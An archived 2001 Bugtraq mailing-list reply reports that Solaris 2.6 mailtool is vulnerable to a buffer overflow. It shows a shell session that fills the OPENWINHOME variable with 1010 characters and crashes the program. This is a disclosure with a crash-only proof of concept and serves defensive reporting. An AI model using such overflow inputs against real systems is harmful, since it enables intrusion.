[20814] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

RE: [synnergy] - Solaris mailtool(1) buffer overflow vulnerability

daemon@ATHENA.MIT.EDU (SChoe)
Wed May 30 16:13:23 2001

Date: Tue, 29 May 2001 13:03:49 -1000 (HST)
From: SChoe <schoe@CheapTickets.COM>
To: <bugtraq@securityfocus.com>
Cc: <tdunlap@CheapTickets.COM>, <bhunter@CheapTickets.COM>,
        <schoe@CheapTickets.COM>, <ssakata@CheapTickets.COM>
Message-ID: <Pine.GSO.4.31.0105291302520.18698-100000@payt01.svl.corp.cheaptickets.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

dethy@synnergy.net wrote:
> [possibly others]

/usr/openwin/bin/mailtool for solaris 2.6 / SPARC is
also vulnerable to buffer overflow.

<------------------------snip-------------------------->
bash-2.04$ uname -a
SunOS <hostname> 5.6 Generic_105181-23 sun4u sparc
bash-2.04$ export OPENWINHOME=`perl -e 'print "A"x1010'`
bash-2.04$ /usr/local/bin/mailtool
Segmentation Fault
bash-2.04$
<------------------------snap-------------------------->


+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
|                                                  |
|       Ph: 808/945.7439   Fax: 808/946.5993       |
:--------------------------------------------------+

home	help	back	first	fref	pref	prev	next	nref	lref	last	post